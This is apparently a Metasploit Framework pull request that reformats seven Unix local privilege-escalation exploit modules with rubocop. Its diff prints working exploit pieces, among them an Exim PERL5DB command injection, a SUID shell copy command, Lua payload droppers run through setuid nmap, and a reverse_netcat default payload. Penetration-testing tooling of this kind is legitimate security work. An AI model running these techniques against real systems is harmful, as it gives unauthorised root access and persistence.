### PR TITLE
rubocop -a modules/exploits/unix/local/

### DIFF
--- a/modules/exploits/unix/local/at_persistence.rb
+++ b/modules/exploits/unix/local/at_persistence.rb
@@ -13,19 +13,19 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        'Name'           => 'at(1) Persistence',
-        'Description'    => %q(
+        'Name' => 'at(1) Persistence',
+        'Description' => %q{
           This module achieves persistence by executing payloads via at(1).
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
             'Jon Hart <jon_hart@rapid7.com>'
           ],
-        'Targets'        => [['Automatic', {} ]],
-        'DefaultTarget'  => 0,
-        'Platform'       => %w(unix),
-        'Arch'           => ARCH_CMD,
+        'Targets' => [['Automatic', {} ]],
+        'DefaultTarget' => 0,
+        'Platform' => %w[unix],
+        'Arch' => ARCH_CMD,
         'DisclosureDate' => '1997-01-01' # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
       )
     )

--- a/modules/exploits/unix/local/chkrootkit.rb
+++ b/modules/exploits/unix/local/chkrootkit.rb
@@ -13,37 +13,40 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Chkrootkit Local Privilege Escalation',
-      'Description'    => %q{
-        Chkrootkit before 0.50 will run any executable file named /tmp/update
-        as root, allowing a trivial privilege escalation.
+    super(
+      update_info(
+        info,
+        'Name' => 'Chkrootkit Local Privilege Escalation',
+        'Description' => %q{
+          Chkrootkit before 0.50 will run any executable file named /tmp/update
+          as root, allowing a trivial privilege escalation.
 
-        WfsDelay is set to 24h, since this is how often a chkrootkit scan is
-        scheduled by default.
-      },
-      'Author'         => [
-        'Thomas Stangner',        # Original exploit
-        'Julien "jvoisin" Voisin' # Metasploit module
-      ],
-      'References'     => [
-        ['CVE', '2014-0476'],
-        ['OSVDB', '107710'],
-        ['EDB', '33899'],
-        ['BID', '67813'],
-        ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
-      ],
-      'DisclosureDate' => '2014-06-04',
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'Privileged'     => true,
-      'Stance'         => Msf::Exploit::Stance::Passive,
-      'Targets'        => [['Automatic', {}]],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
-    ))
+          WfsDelay is set to 24h, since this is how often a chkrootkit scan is
+          scheduled by default.
+        },
+        'Author' => [
+          'Thomas Stangner', # Original exploit
+          'Julien "jvoisin" Voisin' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2014-0476'],
+          ['OSVDB', '107710'],
+          ['EDB', '33899'],
+          ['BID', '67813'],
+          ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
+        ],
+        'DisclosureDate' => '2014-06-04',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Privileged' => true,
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i }
+      )
+    )
 
     register_options([
       OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])

--- a/modules/exploits/unix/local/emacs_movemail.rb
+++ b/modules/exploits/unix/local/emacs_movemail.rb
@@ -10,41 +10,44 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Emacs movemail Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a SUID installation of the Emacs movemail utility
-        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
+    super(
+      update_info(
+        info,
+        'Name' => 'Emacs movemail Privilege Escalation',
+        'Description' => %q{
+          This module exploits a SUID installation of the Emacs movemail utility
+          to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
 
-        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
-      },
-      'Author'         => [
-        'Markus Hess', # Discovery? atrun(8) exploit for sure
-        'Cliff Stoll', # The Cuckoo's Egg hacker tracker
-        'wvu'          # Module and additional research
-      ],
-      'References'     => [
-        %w[URL https://en.wikipedia.org/wiki/Movemail],
-        %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
-        %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
-        %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
-        %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
-        %w[URL https://mailutils.org/manual/html_node/movemail.html]
-      ],
-      'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'SessionTypes'   => %w[shell],
-      'Privileged'     => true,
-      'Payload'        => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
-      'Targets'        => [['/usr/lib/crontab.local', {}]],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {
-        'PAYLOAD'      => 'cmd/unix/generic',
-        'CMD'          => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
-      }
-    ))
+          The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
+        },
+        'Author' => [
+          'Markus Hess', # Discovery? atrun(8) exploit for sure
+          'Cliff Stoll', # The Cuckoo's Egg hacker tracker
+          'wvu' # Module and additional research
+        ],
+        'References' => [
+          %w[URL https://en.wikipedia.org/wiki/Movemail],
+          %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
+          %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
+          %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
+          %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
+          %w[URL https://mailutils.org/manual/html_node/movemail.html]
+        ],
+        'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => %w[shell],
+        'Privileged' => true,
+        'Payload' => { 'BadChars' => "\n", 'Encoder' => 'generic/none' },
+        'Targets' => [['/usr/lib/crontab.local', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/generic',
+          'CMD' => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
+        }
+      )
+    )
 
     register_options([
       OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
@@ -134,10 +137,8 @@ class MetasploitModule < Msf::Exploit::Local
       return cmd_exec(payload.encoded)
     end
 
-    unless datastore['ForceExploit']
-      unless check == CheckCode::Appears
-        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
-      end
+    if !datastore['ForceExploit'] && check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
     end
 
     # outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);

--- a/modules/exploits/unix/local/exim_perl_startup.rb
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
@@ -7,35 +7,38 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Exim "perl_startup" Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a Perl injection vulnerability in Exim < 4.86.2
-        given the presence of the "perl_startup" configuration parameter.
-      },
-      'Author'         => [
-        'Dawid Golunski', # Vulnerability discovery
-        'wvu'             # Metasploit module
-      ],
-      'References'     => [
-        %w{CVE 2016-1531},
-        %w{EDB 39549},
-        %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
-      ],
-      'DisclosureDate' => '2016-03-10',
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'SessionTypes'   => %w{shell meterpreter},
-      'Privileged'     => true,
-      'Payload'        => {
-        'BadChars'     => "\x22\x27" # " and '
-      },
-      'Targets'        => [
-        ['Exim < 4.86.2', {}]
-      ],
-      'DefaultTarget'  => 0
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Exim "perl_startup" Privilege Escalation',
+        'Description' => %q{
+          This module exploits a Perl injection vulnerability in Exim < 4.86.2
+          given the presence of the "perl_startup" configuration parameter.
+        },
+        'Author' => [
+          'Dawid Golunski', # Vulnerability discovery
+          'wvu' # Metasploit module
+        ],
+        'References' => [
+          %w[CVE 2016-1531],
+          %w[EDB 39549],
+          %w[URL http://www.exim.org/static/doc/CVE-2016-1531.txt]
+        ],
+        'DisclosureDate' => '2016-03-10',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => %w[shell meterpreter],
+        'Privileged' => true,
+        'Payload' => {
+          'BadChars' => "\x22\x27" # " and '
+        },
+        'Targets' => [
+          ['Exim < 4.86.2', {}]
+        ],
+        'DefaultTarget' => 0
+      )
+    )
   end
 
   def check
@@ -46,8 +49,8 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def exploit(c = payload.encoded)
+  def exploit(cmd = payload.encoded)
     # PERL5DB technique from http://perldoc.perl.org/perlrun.html
-    cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
+    cmd_exec(%(PERL5OPT=-d PERL5DB='exec "#{cmd}"' exim -ps 2>&-))
   end
 end

--- a/modules/exploits/unix/local/netbsd_mail_local.rb
+++ b/modules/exploits/unix/local/netbsd_mail_local.rb
@@ -10,47 +10,50 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-        'Name'           => 'NetBSD mail.local Privilege Escalation',
-        'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'NetBSD mail.local Privilege Escalation',
+        'Description' => %q{
           This module attempts to exploit a race condition in mail.local with SUID bit set on:
-            NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
-        NetBSD 6.1 - 6.1.5
-        NetBSD 6.0 - 6.0.6
+          NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
+          NetBSD 6.1 - 6.1.5
+          NetBSD 6.0 - 6.0.6
           Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
         },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
-            'h00die <mike@shorebreaksecurity.com>',  # Module
-            'akat1'                             # Discovery
+            'h00die <mike@shorebreaksecurity.com>', # Module
+            'akat1' # Discovery
           ],
 
         'DisclosureDate' => '2016-07-07',
-        'Platform'        => 'unix',
-        'Arch'            => ARCH_CMD,
-        'SessionTypes'    => %w{shell meterpreter},
-        'Privileged'      => true,
-        'Payload'         => {
-          'Compat'        => {
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => %w[shell meterpreter],
+        'Privileged' => true,
+        'Payload' => {
+          'Compat' => {
             'PayloadType' => 'cmd',
             'RequiredCmd' => 'generic openssl'
           }
         },
-        'Targets'       =>
+        'Targets' =>
           [
             [ 'Automatic Target', {}]
           ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
-        'References'     =>
+        'DefaultOptions' => { 'WfsDelay' => 603 }, # can take 10min for cron to kick
+        'References' =>
           [
-            [ "URL", "http://akat1.pl/?id=2"],
-            [ "EDB", "40141"],
-            [ "CVE", "2016-6253"],
-            [ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
+            [ 'URL', 'http://akat1.pl/?id=2'],
+            [ 'EDB', '40141'],
+            [ 'CVE', '2016-6253'],
+            [ 'URL', 'http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc']
           ]
-      ))
+      )
+    )
     register_options([
       OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
       OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
@@ -278,17 +281,17 @@ class MetasploitModule < Msf::Exploit::Local
   }
 }
     # patch in our variable maildir and atrunpath
-    main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
-               "#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
-    main.gsub!(/#define MAILDIR "\/var\/mail"/,
-               "#define MAILDIR \"#{datastore["MAILDIR"]}\"")
+    main.gsub!(%r{#define ATRUNPATH "/usr/libexec/atrun"},
+               "#define ATRUNPATH \"#{datastore['ATRUNPATH']}\"")
+    main.gsub!(%r{#define MAILDIR "/var/mail"},
+               "#define MAILDIR \"#{datastore['MAILDIR']}\"")
 
-    executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
-    payload_file = "#{rand_text_alpha(8)}"
-    payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
+    executable_path = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}"
+    payload_file = rand_text_alpha(8).to_s
+    payload_path = "#{datastore['WritableDir']}/#{payload_file}"
     vprint_status("Writing Payload to #{payload_path}")
     # patch in to run our payload as part of ksh
-    main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
+    main.gsub!(%r{execl\("/tmp/ksh", "ksh", NULL\);},
                "execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
 
     write_file(payload_path, payload.encoded)
@@ -317,12 +320,10 @@ class MetasploitModule < Msf::Exploit::Local
 
     # our sleep timer
     stime = Time.now.to_f
-    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
-      Rex.sleep(1)
-    end
-    print_status("#{Time.now}")
+    Rex.sleep(1) until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
+    print_status(Time.now.to_s)
     register_file_for_cleanup(executable_path)
     register_file_for_cleanup("#{executable_path}.out")
-    print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
+    print_status("Remember to run: chown root:wheel #{datastore['ATRUNPATH']}")
   end
 end

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -13,46 +13,52 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::Remote::Expect
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'OpenSMTPD OOB Read Local Privilege Escalation',
-      'Description'    => %q{
-        This module exploits an out-of-bounds read of an attacker-controlled
-        string in OpenSMTPD's MTA implementation to execute a command as the
-        root or nobody user, depending on the kind of grammar OpenSMTPD uses.
-      },
-      'Author'         => [
-        'Qualys', # Discovery and PoC
-        'wvu'     # Module
-      ],
-      'References'     => [
-        ['CVE', '2020-8794'],
-        ['URL', 'https://seclists.org/oss-sec/2020/q1/96']
-      ],
-      'DisclosureDate' => '2020-02-24',
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Privileged'     => true, # NOTE: Only when exploiting new grammar
-      # Patched in 6.6.4: https://www.opensmtpd.org/security.html
-      # New grammar introduced in 6.4.0: https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
-      'Targets'        => [
-        ['OpenSMTPD < 6.6.4 (automatic grammar selection)',
-          patched_version:     Gem::Version.new('6.6.4'),
-          new_grammar_version: Gem::Version.new('6.4.0')
-        ]
-      ],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {
-        'SRVPORT'      => 25,
-        'PAYLOAD'      => 'cmd/unix/reverse_netcat',
-        'WfsDelay'     => 60 # May take a little while for mail to process
-      },
-      'Notes'          => {
-        'Stability'    => [CRASH_SERVICE_DOWN],
-        'Reliability'  => [REPEATABLE_SESSION],
-        'SideEffects'  => [IOC_IN_LOGS]
-      }
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenSMTPD OOB Read Local Privilege Escalation',
+        'Description' => %q{
+          This module exploits an out-of-bounds read of an attacker-controlled
+          string in OpenSMTPD's MTA implementation to execute a command as the
+          root or nobody user, depending on the kind of grammar OpenSMTPD uses.
+        },
+        'Author' => [
+          'Qualys', # Discovery and PoC
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-8794'],
+          ['URL', 'https://seclists.org/oss-sec/2020/q1/96']
+        ],
+        'DisclosureDate' => '2020-02-24',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true, # NOTE: Only when exploiting new grammar
+        # Patched in 6.6.4: https://www.opensmtpd.org/security.html
+        # New grammar introduced in 6.4.0: https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
+        'Targets' => [
+          [
+            'OpenSMTPD < 6.6.4 (automatic grammar selection)',
+            {
+              patched_version: Gem::Version.new('6.6.4'),
+              new_grammar_version: Gem::Version.new('6.4.0')
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SRVPORT' => 25,
+          'PAYLOAD' => 'cmd/unix/reverse_netcat',
+          'WfsDelay' => 60 # May take a little while for mail to process
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
     register_advanced_options([
       OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
@@ -150,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Local
     sploit = {
       '220' => /EHLO /,
       '250' => /MAIL FROM:<[^>]/,
-      yeet  => nil
+      yeet => nil
     }
 
     print_status('Faking SMTP server and sending exploit')
@@ -158,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
       send_expect(
         line,
         pattern,
-        sock:    client,
+        sock: client,
         newline: "\r\n",
         timeout: datastore['ExpectTimeout']
       )

--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -3,17 +3,18 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
   include Msf::Post::File
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'Setuid Nmap Exploit',
-        'Description'   => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Setuid Nmap Exploit',
+        'Description' => %q{
           Nmap's man page mentions that "Nmap should never be installed with
           special privileges (e.g. suid root) for security reasons.." and
           specifically avoids making any of its binaries setuid during
@@ -25,31 +26,32 @@ class MetasploitModule < Msf::Exploit::Local
           command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}
           payloads will most likely not work.
         },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'egypt' ],
+        'License' => MSF_LICENSE,
+        'Author' => [ 'egypt' ],
         'DisclosureDate' => '2012-07-19',
-        'Platform'      => %w{ bsd linux unix },
-        'Arch'          => [ ARCH_CMD, ARCH_X86 ],
-        'SessionTypes'  => [ 'shell', 'meterpreter' ],
-        'Targets'       =>
+        'Platform' => %w[bsd linux unix],
+        'Arch' => [ ARCH_CMD, ARCH_X86 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' =>
           [
             [ 'Command payload', { 'Arch' => ARCH_CMD } ],
-            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
-            [ 'BSD x86',         { 'Arch' => ARCH_X86 } ],
+            [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+            [ 'BSD x86', { 'Arch' => ARCH_X86 } ],
           ],
-        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
-        'Notes'          =>
+        'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
+        'Notes' =>
           {
             'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability'   => [ CRASH_SAFE ]
+            'Stability' => [ CRASH_SAFE ]
           },
         'DefaultTarget' => 0
-      ))
+      )
+    )
     register_options([
-        # These are not OptPath becuase it's a *remote* path
-        OptString.new("Nmap",      [ true, "Path to setuid nmap executable", "/usr/bin/nmap" ]),
-        OptString.new("ExtraArgs", [ false, "Extra arguments to pass to Nmap (e.g. --datadir)", "" ]),
-      ])
+      # These are not OptPath becuase it's a *remote* path
+      OptString.new('Nmap', [ true, 'Path to setuid nmap executable', '/usr/bin/nmap' ]),
+      OptString.new('ExtraArgs', [ false, 'Extra arguments to pass to Nmap (e.g. --datadir)', '' ]),
+    ])
     register_advanced_options [
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
     ]
@@ -65,39 +67,38 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     if (target.arch.include? ARCH_CMD)
-      p = payload.encoded.gsub(/([$"])/) {|m| "\\#{$1}" }
-      evil_lua = %Q{ os.execute("#{p} &") }
+      p = payload.encoded.gsub(/([$"])/) { |_m| "\\#{Regexp.last_match(1)}" }
+      evil_lua = %{ os.execute("#{p} &") }
     else
-      exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf"
+      exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.elf"
       print_status("Dropping executable #{exe_file}")
       write_file(exe_file, generate_payload_exe)
-      evil_lua = %Q{
+      evil_lua = %{
         os.execute("chown root:root #{exe_file}");
         os.execute("chmod 6700 #{exe_file}");
         os.execute("#{exe_file} &");
         os.execute("rm -f #{exe_file}");
       }
     end
-    lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
+    lua_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.nse"
     print_status("Dropping lua #{lua_file}")
     write_file(lua_file, evil_lua)
 
     print_status("Running #{lua_file} with Nmap")
 
     scriptname = lua_file
-    if (lua_file[0,1] == "/")
+    if (lua_file[0, 1] == '/')
       # Versions before 4.51BETA (December 2007) only accept relative paths for script names
       # Figure 10 up-directory traversals is enough.
-      scriptname = ("../" * 10) + lua_file[1..-1]
+      scriptname = ('../' * 10) + lua_file[1..-1]
     end
 
     begin
       # Versions before 4.75 (August 2008) will not run scripts without a port scan
-      cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
+      cmd_exec "#{datastore['Nmap']} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
     ensure
       rm_f(lua_file, exe_file)
     end
 
   end
 end
-


### PR DESCRIPTION
Clean Rubocop output is a requirement for new code. It makes sense that existing code should also conform to the same standards. This prevents copypasta of "bad" code style.

This PR applies changes to a directory with a small number of modules as a test run. Eventually, it would be nice if rubocop returned no errors or warnings for the entire repository.

These changes were applied automatically with `rubocop -a` and manually reviewed for sanity.

These were changed manually:

```diff
-      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
+      'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i }
```

```diff
-  def exploit(c = payload.encoded)
+  def exploit(cmd = payload.encoded)
```

If you're unhappy with these changes, or think these changes broke something, this is a good opportunity to address customization of existing Rubocop rules or adding new [custom rules](https://github.com/rapid7/metasploit-framework/tree/master/lib/rubocop/cop).
